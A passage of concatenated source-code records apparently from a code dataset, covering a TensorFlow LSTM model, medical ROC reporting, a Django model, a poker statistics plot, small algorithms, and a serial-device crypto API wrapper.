trainable=False)\n\n def run_model(concatenated_input):\n initial_state = cell.zero_state(batch_size, tf.float32)\n rnn_outputs, rnn_states = tf.nn.dynamic_rnn(cell, concatenated_input, initial_state=initial_state,\n time_major=False)\n res = map_fn(final_projection, rnn_outputs)\n res = self.print_tensor_with_shape(res, \"res\")\n return res\n\n def while_body(x, current_y, iteration_counter, converged_iteration):\n iteration_counter = self.print_variable(iteration_counter, 'start of iteration, iteration counter is: ')\n converged_iteration = iteration_counter\n\n concatenated_input = tf.concat((x, current_y), axis=2)\n next_y = run_model(concatenated_input)\n next_y = self.print_tensor_with_shape(next_y, \"next_y\")\n\n def pred_argmax_stable(iteration_counter):\n current_y_argmax = tf.argmax(current_y, axis=2)\n current_y_argmax = self.print_tensor_with_shape(current_y_argmax, \"current_y_argmax\")\n next_y_argmax = tf.argmax(next_y, axis=2)\n next_y_argmax = self.print_tensor_with_shape(next_y_argmax, \"next_y_argmax\")\n return tf.cond(\n tf.reduce_all(tf.equal(current_y_argmax, next_y_argmax)),\n lambda: max_iteration,\n lambda: iteration_counter + 1\n )\n\n iteration_counter = tf.cond(\n tf.reduce_all(tf.equal(tf.shape(current_y), tf.shape(next_y))),\n lambda: pred_argmax_stable(iteration_counter),\n lambda: iteration_counter + 1\n )\n\n current_y = next_y\n self.print_variable(iteration_counter, 'start of iteration, iteration counter is: ')\n return [x, current_y, iteration_counter, converged_iteration]\n\n y_shape = current_y.get_shape().as_list()\n y_shape[1] = tf.Dimension(None)\n y_shape_invariant = tf.TensorShape(y_shape)\n\n _, self.predicted_outputs, __, self.converged_iteration = \\\n tf.while_loop(lambda x, current_y, iteration_counter, converged_iteration:\n iteration_counter < max_iteration,\n while_body,\n [x, current_y, iteration_counter, self.converged_iteration],\n shape_invariants=[\n x.get_shape(),\n y_shape_invariant,\n iteration_counter.get_shape(),\n self.converged_iteration.get_shape()\n ],\n parallel_iterations=1,\n back_prop=True\n )\n predicted_outputs = self.print_tensor_with_shape(self.predicted_outputs, 'predicted_outputs')\n\n casted_outputs = tf.cast(outputs, tf.float32)\n error = -(casted_outputs * tf.log(predicted_outputs + sys.float_info.epsilon) +\n (1.0 - casted_outputs) * tf.log(1.0 - predicted_outputs + sys.float_info.epsilon))\n self.error = tf.reduce_mean(error)\n self.train_step = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.error)\n\n predicted_outputs_maximized = tf.argmax(self.predicted_outputs, axis=2)\n predicted_outputs_maximized = self.print_tensor_with_shape(predicted_outputs_maximized,\n \"predicted_outputs_maximized\")\n\n outputs_maximized = tf.argmax(outputs, axis=2)\n outputs_maximized = self.print_tensor_with_shape(outputs_maximized, \"outputs_maximized\")\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(outputs_maximized, predicted_outputs_maximized),\n dtype=tf.float16))\n\n def print_tensor_with_shape(self, tensor, name):\n return tf.cond(self.should_print,\n lambda: tf.Print(\n tf.Print(tensor, [tensor], message=name + \":\"),\n [tf.shape(tensor)], message=name + \" shape:\"),\n lambda: tf.identity(tensor))\n\n def print_variable(self, variable, prefix_message=''):\n return tf.cond(self.should_print,\n lambda: tf.Print(variable, [variable], message=prefix_message + variable.name + \":\"),\n lambda: tf.identity(variable))\n","sub_path":"pondering_lstm_model.py","file_name":"pondering_lstm_model.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"292731153","text":"import argparse\nimport os\nimport glob\nimport numpy as np\nfrom butil.dataset import _ham_get_data, ensure_dir_for_file, _test_doctor_performance_dermoscopic, _test_doctor_performance_clinical\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D\nimport math\nimport sklearn.metrics as metrics\nfrom sklearn.metrics import accuracy_score,roc_auc_score\nglobal _ty_true, _ty_preds\n_ty_true = []\n_ty_preds = []\n\ndef __test_doctor_performance_dermoscopic():\n global _ty_true, _ty_preds\n if len(_ty_true) == 0:\n _ty_true, _ty_preds = _test_doctor_performance_dermoscopic()\n return [_ty_true, _ty_preds]\ndef report_auc_sen_spe(y_true, y_proba):\n y_pred = (y_proba > 0.5).astype('int32')\n all_test = len(y_true)\n all_p = len([e for e in y_true if e == 1])\n all_n = all_test - all_p\n true_p = len([i for i, j in zip(y_pred, y_true) if (i == j) and (i == 1) ])\n true_n = len([i for i, j in zip(y_pred, y_true) if (i == j) and (i == 0) ])\n sen = 1.0\n spe = 1.0\n if all_p > 0:\n sen = float(true_p) / all_p\n if all_n > 0:\n spe = float(true_n) / all_n \n auc = roc_auc_score(y_true, y_proba)\n return [auc,sen,spe]\ndef report_metric(y_test, y_pred):\n all_test = len(y_test)\n all_p = len([e for e in y_test if e == 1])\n all_n = all_test - all_p\n true_p = len([i for i, j in zip(y_pred, y_test) if (i == j) and (i == 1) ])\n true_n = len([i for i, j in zip(y_pred, y_test) if (i == j) and (i == 0) ])\n \n sen = 1.0\n spe = 1.0\n if all_p > 0:\n sen = float(true_p) / all_p\n if all_n > 0:\n spe = float(true_n) / all_n\n return [sen,spe]\ndef report_load(f):\n data = np.load(f,allow_pickle=True)\n return data.flat\ndef report_colors(type = \"\"):\n if type == \"bar\":\n return [\"blue\",\"green\",\"purple\",\"pink\",\"red\",\"orange\",\"gray\",\"violet\",\"yellow\",\"tan\",\"gold\",\"darkcyan\",\"skyblue\"]\n elif type == \"roc\":\n return [\"blue\",\"green\",\"purple\",\"pink\",\"red\",\"orange\",\"gray\",\"violet\",\"yellow\",\"tan\",\"gold\",\"darkcyan\",\"skyblue\"]\n return [\"tan\",\"gold\",\"darkcyan\",\"skyblue\",\"yellow\",\"green\",\"purple\",\"pink\",\"red\",\"orange\",\"gray\",\"blue\",\"violet\",\"hotpink\",\"maroon\",\"burlywood\",\"kaki\"]\ndef report_markers():\n return ['o', 'x', '+', 'v', '^', '<', '>', 's', 'd','p','h','*','|','0','1','2','3']\ndef report_show_roc(y_true, y_pred, name, ind, marker = True):\n colors = report_colors(\"roc\")\n fpr, tpr, threshold = metrics.roc_curve(y_true, y_pred)\n roc_auc = metrics.auc(fpr, tpr)\n label = \"ROC of %s, AUC = %0.1f\" % (name, 100 * roc_auc)\n if marker:\n markersize = 8 - ind * 2\n plt.plot(fpr, tpr, colors[ind], marker='.', label = label, markersize = markersize )\n else:\n plt.plot(fpr, tpr, colors[ind], label = label)\ndef report_show_doctor(y_true, y_preds):\n label = \"Dermatologists\"\n c = \"red\"\n x = []\n y = [] \n for y_pred in y_preds:\n sen,spe = report_metric(y_true, y_pred)\n x.append(1.0 - spe)\n y.append(sen)\n print(\"report_show_doctor->SEN=\\n\", y)\n print(\"report_show_doctor->1 - SPE=\\n\", x)\n plt.scatter(x, y, marker='.', color = c, label= label)\ndef report_filter_spe(y_test, y_pred, sthreshold=0):\n fpr, tpr, threshold = metrics.roc_curve(y_test, y_pred)\n roc_auc = metrics.auc(fpr, tpr)\n n = len(tpr)\n ret = []\n msen = 0\n for i in range(n):\n sen = tpr[i]\n if (sen < sthreshold):\n continue\n spe = 1 - fpr[i]\n if msen == 0:\n msen = sen\n ret.append(spe)\n elif msen == sen:\n ret.append(spe)\n else:\n break\n return ret\ndef report_filter_sen(y_test, y_pred, sthreshold=0):\n fpr, tpr, threshold = metrics.roc_curve(y_test, y_pred)\n roc_auc = metrics.auc(fpr, tpr)\n n = len(tpr)\n ret = []\n mspe = 0\n for i in range(n-1,-1,-1):\n spe = 1 - fpr[i]\n if (spe < sthreshold):\n continue\n sen = tpr[i]\n if mspe == 0:\n mspe = spe\n ret.append(sen)\n elif mspe == spe:\n ret.append(sen)\n else:\n break\n return ret\ndef report_compare_doctors(y_true, y_pred):\n ty_true, ty_preds = __test_doctor_performance_dermoscopic()\n total_doctor_win = 0\n total_doctor_eq = 0\n total_doctor_loss = 0\n for ty_pred in ty_preds:\n sen,spe = report_metric(ty_true, ty_pred)\n cnnspedatas = report_filter_spe(y_true, y_pred, sen)\n cnnsped = np.amax(cnnspedatas)\n if (cnnsped > spe):\n total_doctor_win += 1\n elif (cnnsped == spe):\n total_doctor_eq += 1\n else:\n total_doctor_loss += 1\n return [total_doctor_win,total_doctor_eq,total_doctor_loss]\ndef report_chart_roc_info(datas, l):\n ret = \"\"\n mean = np.mean(datas)\n max = np.amax(datas)\n min = np.amin(datas)\n ret += l + \"=\" + \"%0.1f\" % (100* max)\n return ret\ndef report_roc_compare_thresholds(y_true, y_pred, thresholds):\n ret = \"\"\n pre = \"\\n\"\n for athreshold in thresholds:\n if (athreshold[\"type\"] == \"spe\"):\n mdatas = report_filter_spe(y_true, y_pred, athreshold[\"thres\"])\n else:\n mdatas = report_filter_sen(y_true, y_pred, athreshold[\"thres\"])\n \n ret += pre + report_chart_roc_info(mdatas,athreshold[\"label\"] + \"->\" + athreshold[\"type\"])\n return ret\ndef report_roc_by(y_true, y_pred, f=\"\", name = \"\", title=\"\", show_d = True, show_compare = True, show_compare_thresholds = True):\n print(\"report_roc_by->start\")\n thresholds = [ \n {\"thres\": 1.0,\"type\":\"spe\",\"label\":\"sen(100)\"},\n {\"thres\": 0.95,\"type\":\"spe\",\"label\":\"sen(95.0)\"},\n {\"thres\": 0.9,\"type\":\"spe\",\"label\":\"sen(90.0)\"},\n {\"thres\": 0.85,\"type\":\"spe\",\"label\":\"sen(85.0)\"},\n {\"thres\": 0.80,\"type\":\"spe\",\"label\":\"sen(80.0)\"},\n {\"thres\": 0.767,\"type\":\"spe\",\"label\":\"sen(76.7)\"},\n {\"thres\": 0.741,\"type\":\"spe\",\"label\":\"sen(74.1)\"},\n {\"thres\": 1.0,\"type\":\"sen\",\"label\":\"spe(100)\"},\n {\"thres\": 0.95,\"type\":\"sen\",\"label\":\"spe(95.0)\"},\n {\"thres\": 0.9,\"type\":\"sen\",\"label\":\"spe(90.0)\"},\n {\"thres\": 0.85,\"type\":\"sen\",\"label\":\"spe(85.0)\"},\n {\"thres\": 0.8,\"type\":\"sen\",\"label\":\"spe(80.0)\"},\n #{\"thres\": 0.75,\"type\":\"sen\",\"label\":\"spe(75.0)\"},\n {\"thres\": 0.692,\"type\":\"sen\",\"label\":\"spe(69.2)\"},\n {\"thres\": 0.600,\"type\":\"sen\",\"label\":\"spe(60.0)\"},\n ]\n plt.clf()\n report_show_roc(y_true, y_pred, name, 0, marker=True)\n #Dermatologists\n if show_d :\n ty_true, ty_preds = __test_doctor_performance_dermoscopic()\n report_show_doctor(ty_true, ty_preds)\n #Comparasion with Dermatologists\n gtitle = \"Dermatologists\"\n if show_compare_thresholds:\n gtitle += report_roc_compare_thresholds(y_true, y_pred, thresholds)\n if show_compare :\n win,eq,ls = report_compare_doctors(y_true, y_pred)\n dtitle = \"WIN = \" + str(win) \n dtitle += \", EQUAL= \" + str(eq) \n dtitle += \", LOSS= \" + str(ls) \n plt.text(0.25, .02, gtitle + \"\\n\" + dtitle)\n if title != \"\":\n plt.title(legend)\n \n plt.legend(loc = 'center right',scatterpoints=1)\n plt.ylabel('Sensitivity')\n plt.xlabel('1 - Specificity')\n ensure_dir_for_file(f)\n plt.savefig(f)\n plt.close()\n print(\"report_rocs_by->end\")\ndef report_chart_autolabel(rects, ax, fontsize):\n for rect in rects:\n height = rect.get_height()\n ax.text(rect.get_x() + rect.get_width()/2., height + .006,\n '%.01f' % float(height * 100),\n ha='center', va='bottom', fontsize=fontsize)\ndef report_chart_bars(datas, f=\"\", by=\"dermoscopic\"):\n print(\"report_chart_bars->start,by=\", by)\n colors = report_colors(type=\"bar\")\n bar_width = 0.18\n fontsize = 8\n opacity = 1\n plt.clf()\n fig, ax = plt.subplots()\n ind = 0\n dlen = len(datas)\n groups = [\"AUC\",\"SEN\",\"SPE\"]\n index = np.arange(dlen)\n for ind in range(dlen):\n data = datas[ind]\n #bdatas = np.zeros(dlen,dtype=float)\n print(\"report_chart_bars->type=\",data[\"type\"])\n #groups.append(data[\"type\"])\n y_true = data[by][\"y_true\"]\n y_pred = data[by][\"y_pred\"]\n bdatas = report_auc_sen_spe(y_true,y_pred)\n #bdatas[0] = roc_auc\n rects = plt.bar(index + ind * bar_width, \n bdatas, \n bar_width,\n alpha=opacity,\n color=colors[ind],\n label=data[\"type\"])\n report_chart_autolabel(rects, ax, fontsize)\n \n ax.set_ylabel('Performance')\n '''if by == \"dermoscopic\":\n ax.set_xlabel(\"Performances tested by MClass-D using a prediction threshold of 0.5\")\n else:\n ax.set_xlabel(\"Performances tested by test-10 using a prediction threshold of 0.5\")\n '''\n ax.set_xticks(index + bar_width * (dlen - 1) / 2.0)\n ax.set_xticklabels(tuple(groups))\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),ncol=dlen)\n ensure_dir_for_file(f)\n plt.savefig(f)\n plt.close()\n print(\"report_chart_bars->end,by=\", by)\ndef report_rocs_by(datas=[],f=\"\", by=\"dermoscopic\", show_d=True, title=\"\", marker=True):\n print(\"report_rocs_by->start,by=\", by)\n plt.clf()\n ind = 0\n #print(datas[0])\n for ind in range(len(datas)):\n data = datas[ind]\n print(\"report_rocs_by->type=\",data[\"type\"])\n y_true = data[by][\"y_true\"]\n y_pred = data[by][\"y_pred\"]\n report_show_roc(y_true, y_pred, data[\"type\"], ind, marker)\n #ind += 1\n #Dermatologists\n if show_d :\n ty_true, ty_preds = __test_doctor_performance_dermoscopic()\n report_show_doctor(ty_true, ty_preds)\n if title != \"\":\n plt.title(legend)\n \n plt.legend(loc = 'center right',scatterpoints=1)\n plt.ylabel('Sensitivity')\n plt.xlabel('1 - Specificity')\n ensure_dir_for_file(f)\n plt.savefig(f)\n plt.close()\n print(\"report_rocs_by->end,by=\", by)\ndef report_show_rocs_dermoscopic(datas, output_dir):\n f = os.path.join(output_dir, \"roc_final_dermoscopic.jpg\")\n report_rocs_by(datas,f=f, by=\"dermoscopic\", show_d=True, title=\"\")\ndef report_show_rocs_isic_test(datas, output_dir):\n f = os.path.join(output_dir, \"roc_final_isic_test_doctor.jpg\")\n report_rocs_by(datas,f=f, by=\"test\", show_d=True, title=\"\",marker=False)\n f = os.path.join(output_dir, \"roc_final_isic_test.jpg\")\n report_rocs_by(datas,f=f, by=\"test\", show_d=False, title=\"\",marker=False)\ndef report_show_rocs_isic_val(datas, output_dir):\n f = os.path.join(output_dir, \"roc_final_isic_val_doctor.jpg\")\n report_rocs_by(datas,f=f, by=\"val\", show_d=True, title=\"\",marker=False)\n f = os.path.join(output_dir, \"roc_final_isic_val.jpg\")\n report_rocs_by(datas,f=f, by=\"val\", show_d=False, title=\"\",marker=False)\ndef report_show_roc_detail(datas, output_dir):\n #by=\"dermoscopic\"\n labels = [\"val\",\"test\",\"dermoscopic\"]\n for by in labels:\n for ind in range(len(datas)):\n data = datas[ind]\n print(\"report_show_roc_detail->type=\",data[\"type\"])\n y_true = data[by][\"y_true\"]\n y_pred = data[by][\"y_pred\"]\n report_print_by_threshold(y_true, y_pred, data[\"type\"], by)\n f = os.path.join(output_dir, \"detail_roc_\" + by + \"_\" + data[\"type\"] + \".jpg\")\n report_roc_by(y_true, y_pred, f=f, name = data[\"type\"], title=\"\", show_d = True, show_compare = True)\ndef report_print_by_threshold(y_true, y_pred, type, by):\n fpr, tpr, threshold = metrics.roc_curve(y_true, y_pred)\n n = len(tpr)\n ret = \"\"\n for i in range(n):\n spe = 1 - fpr[i]\n sen = tpr[i]\n t = \"\\n%0.5f\\t%0.5f\\t%0.8f\" % (sen, spe, threshold[i])\n ret += t\n print(\"=====FINAL RESULT ========\", type, by)\n print(ret)\n print(\"=====END FINAL RESULT ========\", type, by)\ndef report_save_bars(datas, output_dir):\n labels = [\"val\",\"test\",\"dermoscopic\"]\n for by in labels:\n f = os.path.join(output_dir, \"bar_\" + by + \".jpg\")\n report_chart_bars(datas, f = f, by= by)\ndef main(FLAGS):\n data_file = FLAGS.data_file\n output_dir = FLAGS.output_dir\n rdatas = report_load(data_file)\n report_show_rocs_isic_test(rdatas,output_dir)\n report_show_rocs_isic_val(rdatas,output_dir)\n report_show_rocs_dermoscopic(rdatas,output_dir)\n report_show_roc_detail(rdatas, output_dir)\n report_save_bars(rdatas, output_dir)\nif __name__ == \"__main__\":\n \n FLAGS = None\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--data_file',\n type=str,\n default='result/best_loss/ResNet50/final_loss_scientific-reports.npy',\n help='input data file'\n )\n \n parser.add_argument(\n '--output_dir',\n type=str,\n default='result/report-best_loss-InceptionV3',\n help='output_dir'\n )\n FLAGS = parser.parse_args()\n print (\"data_file=\",FLAGS.data_file)\n print (\"output_dir=\",FLAGS.output_dir)\n main(FLAGS)\n ","sub_path":"src/run.report.viz.loss.py","file_name":"run.report.viz.loss.py","file_ext":"py","file_size_in_byte":13191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"79100357","text":"from django.db import models\nfrom django.utils import timezone\n\nclass Data(models.Model):\n \"\"\" 解析データクラス \"\"\"\n\n def __init__(self):\n self.author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n self.title = models.CharField(max_length=200)\n self.text = models.TextField()\n self.figures_int = models.IntegerField()\n self.figures_float = models.FloatField()\n self.created_date = models.DateTimeField(default=timezone.now)\n self.published_date = models.DateTimeField(blank=True, null=True)\n\n def publish(self):\n \"\"\" データ公開 \"\"\"\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.title\n\n","sub_path":"analysys/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"632640763","text":"from weakref import proxy\n\nimport numpy as np\nfrom matplotlib.backends.backend_qt5agg import (\n FigureCanvasQTAgg as FigureCanvas)\nfrom matplotlib.figure import Figure\n\n\nclass BarPlotter2(FigureCanvas):\n def __init__(self, ui_analyser, lst):\n self.ui_analyser = proxy(ui_analyser)\n self.fig = Figure(dpi=70)\n self.axes = self.fig.add_subplot(111) # create an axis\n super(BarPlotter2, self).__init__(self.fig)\n self.drawfigure(lst, self.ui_analyser.combobox_strategy.currentText(),\n self.ui_analyser.combobox_gamestage.currentText(),\n self.ui_analyser.combobox_actiontype.currentText())\n self.ui_analyser.vLayout_bar.insertWidget(1, self)\n\n def drawfigure(self, lst, strategy, last_stage='All', last_action='All'):\n self.fig.clf()\n self.axes = self.fig.add_subplot(111) # create an axis\n\n p_name = str(strategy)\n data = lst.get_stacked_bar_data('Template', p_name, 'stackedBar', last_stage=last_stage, last_action=last_action)\n\n N = 11\n Bluff = data[0]\n BP = data[1]\n BHP = data[2]\n Bet = data[3]\n Call = data[4]\n Check = data[5]\n Fold = data[6]\n ind = np.arange(N) # the x locations for the groups\n width = 1 # the width of the bars: can also be len(x) sequence\n\n self.p0 = self.axes.bar(ind, Bluff, width, color='y')\n self.p1 = self.axes.bar(ind, BP, width, color='k', edgecolor='black', bottom=Bluff)\n self.p2 = self.axes.bar(ind, BHP, width, color='b', edgecolor='black', bottom=[sum(x) for x in zip(Bluff, BP)])\n self.p3 = self.axes.bar(ind, Bet, width, color='c', edgecolor='black',\n bottom=[sum(x) for x in zip(Bluff, BP, BHP)])\n self.p4 = self.axes.bar(ind, Call, width, color='g', edgecolor='black',\n bottom=[sum(x) for x in zip(Bluff, BP, BHP, Bet)])\n self.p5 = self.axes.bar(ind, Check, width, color='w', edgecolor='black',\n bottom=[sum(x) for x in zip(Bluff, BP, BHP, Bet, Call)])\n self.p6 = self.axes.bar(ind, Fold, width, color='r', edgecolor='black',\n bottom=[sum(x) for x in zip(Bluff, BP, BHP, Bet, Call, Check)])\n\n self.axes.set_ylabel('Profitability')\n self.axes.set_title('FinalFundsChange ABS')\n self.axes.set_xlabel(['PF Win', 'Loss', '', 'F Win', 'Loss', '', 'T Win', 'Loss', '', 'R Win', 'Loss'])\n # plt.yticks(np.arange(0,10,0.5))\n # self.c.tight_layout()\n self.axes.legend((self.p0[0], self.p1[0], self.p2[0], self.p3[0], self.p4[0], self.p5[0], self.p6[0]),\n ('Bluff', 'BetPot', 'BetHfPot', 'Bet/Bet+', 'Call', 'Check', 'Fold'), labelspacing=0.03,\n prop={'size': 12})\n i = 0\n maxh = 0.02\n for rect0, rect1, rect2, rect3, rect4, rect5, rect6 in zip(self.p0.patches, self.p1.patches,\n self.p2.patches,\n self.p3.patches, self.p4.patches,\n self.p5.patches, self.p6.patches):\n g = list(zip(data[0], data[1], data[2], data[3], data[4], data[5], data[6]))\n height = g[i]\n i += 1\n rect0.set_height(height[0])\n rect1.set_y(height[0])\n rect1.set_height(height[1])\n rect2.set_y(height[0] + height[1])\n rect2.set_height(height[2])\n rect3.set_y(height[0] + height[1] + height[2])\n rect3.set_height(height[3])\n rect4.set_y(height[0] + height[1] + height[2] + height[3])\n rect4.set_height(height[4])\n rect5.set_y(height[0] + height[1] + height[2] + height[3] + height[4])\n rect5.set_height(height[5])\n rect6.set_y(height[0] + height[1] + height[2] + height[3] + height[4] + height[5])\n rect6.set_height(height[6])\n maxh = max(height[0] + height[1] + height[2] + height[3] + height[4] + height[5] + height[6], maxh)\n\n # self.axes.set_ylim((0, maxh))\n\n self.draw()\n","sub_path":"poker/gui/plots/bar_plotter_2.py","file_name":"bar_plotter_2.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"375922197","text":"#-*- coding:utf-8 -*-\n#Filename:tanxin2.py\n#Date :2018/9/11 下午1:36\n#auther :mudy\n#E-mail :mudyabc@gmail.com\n#Blog :txmudy.cn\n\n# -*- coding:utf-8 -*-\nimport timeit\n\ndef main():\n s = [-1,1,2,3,4,5,-2,-3,-4,-7]\n\n s_sum,s_max = 0,0\n\n for i in range(len(s)):\n s_sum += s[i]\n if s_sum > s_max:\n s_max = s_sum\n elif s_sum < 0: #如果小于0的话,就已经不能做贡献了,所以,之后的话,就从0继续加\n s_sum = 0\n print(\"最大子数组的和为\",s_max)\n\n\nif __name__ == \"__main__\":\n start = timeit.default_timer()\n main()\n end = timeit.default_timer()\n print(\"程序执行时间\",end-start)#cpu的执行时间","sub_path":"al/tanxin2.py","file_name":"tanxin2.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"360327072","text":"\"\"\"\n@author: jtusta\n@license: MIT Licence \n@contact: root@jtahstu.com\n@site: www.jtahstu.com\n@software: PyCharm Community Edition\n@file: quickSort.py\n@time: 2017/01/10 18:25\n\"\"\"\n\nlist = [5, 4, 7, 8, 9, 1, 2, 3]\nprint(list)\n\n\ndef quickSort(left, right):\n if left > right:\n return\n temp = list[left]\n i = left\n j = right\n while (i != j):\n while list[j] >= temp and i < j:\n j -= 1\n while list[i] <= temp and i < j:\n i += 1\n if i < j:\n list[i], list[j] = list[j], list[i]\n list[left] = list[i]\n list[i] = temp\n\n quickSort(left, i - 1)\n quickSort(i + 1, right)\n\n\nquickSort(0, len(list) - 1)\nprint(list)\n","sub_path":"Projects/Algorithm/AhaAlgorithm/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"143498931","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport json\nimport re\n\nfile_path = \"../data/idiom.json\"\n\n# 查找包含某字词的全部成语\ndef findIdiomsByWord(in_word):\n with open( file_path, 'r' , encoding='utf-8' ) as f:\n file_dict = json.load(f)\n # 匹配汉语字符串。某些成语包含逗号!!!\n word_pattern = \"([\\u4e00-\\u9fa5]*,?[\\u4e00-\\u9fa5]*\"+in_word+\"[\\u4e00-\\u9fa5]*,?[\\u4e00-\\u9fa5]*)\"\n match_word_list = []\n for item in file_dict:\n if re.findall( word_pattern , item['word'] ):\n match_word_list.append(re.findall( word_pattern , item['word'] )[0])\n return match_word_list\n\nidioms_result = findIdiomsByWord(\"万夫\")\nprint(idioms_result)\n\n","sub_path":"scripts/idiomTools.py","file_name":"idiomTools.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"516070742","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Author: zealotnt\n# @Date: 2017-05-12 10:52:38\n\n#---- IMPORTS\nimport os\nimport serial\nimport struct\nimport binascii\nimport time\nimport sys\n\nfrom crc8 import crc8\nfrom utils import *\nfrom datalink_deliver import *\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\n\n#---- CLASSES\nclass SiriusAPICrypto():\n\t\"\"\"\n\tSiriusAPICrypto class, implement crypto API of Sirius\n\t\"\"\"\n\tVERBOSE=False\n\n\t# SHA\n\tsha_dict = {\n\t\t\"SHA1\": 0,\n\t\t\"SHA224\": 1,\n\t\t\"SHA256\": 2,\n\t\t\"SHA384\": 3,\n\t\t\"SHA512\": 4,\n\t}\n\tsha_functions = {\n\t\t\"SHA1\": hashes.SHA1(),\n\t\t\"SHA224\": hashes.SHA224(),\n\t\t\"SHA256\": hashes.SHA256(),\n\t\t\"SHA384\": hashes.SHA384(),\n\t\t\"SHA512\": hashes.SHA512(),\n\t}\n\n\t# ECDSA\n\tecdsa_curve = {\n\t\t\"secp256k1\": 0,\n\t\t\"secp256r1\": 0,\n\t}\n\tecdsa_sha_functions = {\n\t\t\"SHA1\": 0,\n\t\t\"SHA256\": 1,\n\t}\n\n\t# DSA\n\tdsa_sha_functions = {\n\t\t\"SHA1\": 0,\n\t\t\"SHA256\": 1,\n\t}\n\n\t# AES\n\taes_key_length = [16, 24, 32]\n\taes_mode = {\n\t\t\"ECB_ENC\":\t0,\n\t\t\"ECB_DEC\":\t1,\n\t\t\"CBC_ENC\":\t2,\n\t\t\"CBC_DEC\":\t3,\n\t\t\"OFB_ENC\":\t4,\n\t\t\"OFB_DEC\":\t5,\n\t\t\"CFB_ENC\":\t6,\n\t\t\"CFB_DEC\":\t7,\n\t}\n\taes_block_size = 16\n\n\t# TDES\n\ttdes_key_length = [8, 16, 24]\n\ttdes_mode = {\n\t\t\"ECB_ENC\":\t0,\n\t\t\"ECB_DEC\":\t1,\n\t\t\"CBC_ENC\":\t2,\n\t\t\"CBC_DEC\":\t3,\n\t\t\"OFB_ENC\":\t4,\n\t\t\"OFB_DEC\":\t5,\n\t\t\"CFB_ENC\":\t6,\n\t\t\"CFB_DEC\":\t7,\n\t}\n\ttdes_block_size = 8\n\n\t# CMAC\n\tcmac_operation = {\n\t\t\"TDES\": 0,\n\t\t\"AES\": 1,\n\t}\n\tcmac_key_length = {\n\t\t\"TDES\": tdes_key_length,\n\t\t\"AES\": aes_key_length\n\t}\n\n\t# RSA\n\trsa_operations = {\n\t\t\"ENC\": 0,\n\t\t\"DEC\": 1,\n\t}\n\n\tdef __init__(self, bluefin_serial, verbose=False):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tself._datalink = bluefin_serial\n\t\tself.VERBOSE = verbose\n\n\t@staticmethod\n\tdef getShaMethodList():\n\t\tret = []\n\t\tfor key in SiriusAPICrypto.sha_dict:\n\t\t\tret.append(key)\n\t\treturn ret\n\n\t@staticmethod\n\tdef getShaMethodStr():\n\t\treturn ', '.join(['%s' % (key) for (key, value) in SiriusAPICrypto.sha_dict.items()])\n\n\tdef Trng(self, target, numberOfBytes):\n\t\t\"\"\"\n\n\t\t\"\"\"\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\t\tpkt = BluefinserialCommand(sirius_target)\n\t\ttrng_package = struct.pack(' method of hashing\n\t\tmessage: message to be hased\n\t\tisApp: if true, will send to Application processor\n\t\t\"\"\"\n\t\tif method not in SiriusAPICrypto.sha_dict:\n\t\t\tprint_err(\"Invalid method: %s\" % method)\n\t\t\treturn None\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\t\tpkt = BluefinserialCommand(sirius_target, verbose=verbose)\n\t\tsha_package = struct.pack('I', RSA_e)\n\t\t\t\tinfo.AddValList('RSA_e', RSA_e_str)\n\t\t\telif isinstance(RSA_e, str ):\n\t\t\t\tinfo.AddValList('RSA_e', RSA_e)\n\t\t\telse:\n\t\t\t\tprint_err(\"Invalid value of RSA_e, abort\")\n\t\t\t\treturn None\n\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\n\t\tfor item in info.ValList():\n\t\t\tpkt = BluefinserialCommand(sirius_target, verbose=verbose)\n\t\t\tcmd = pkt.Packet('\\x8b', '\\x46', item)\n\t\t\trsp = self._datalink.Exchange(cmd)\n\t\t\tif (rsp is None):\n\t\t\t\tprint_err(\"Send fail\")\n\t\t\t\treturn None\n\t\t\tif rsp[2] != '\\x00':\n\t\t\t\tprint_err(\"Key download fail, code 0x%02x\" % ord(rsp[2]))\n\t\t\t\treturn None\n\t\treturn True\n\n\tdef EcdsaSign(self, target, curve, hashAlgo, message, verbose=False):\n\t\t\"\"\"\n\t\treturn:\n\t\t+ signature if success\n\t\t+ None if fail\n\t\t\"\"\"\n\t\tif curve not in SiriusAPICrypto.ecdsa_curve:\n\t\t\tprint_err(\"Invalid curve: %s\" % curve)\n\t\t\treturn None\n\t\tif hashAlgo not in SiriusAPICrypto.ecdsa_sha_functions:\n\t\t\tprint_err(\"Invalid hash: %s\" % hashAlgo)\n\t\t\treturn None\n\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\n\t\tpkt = 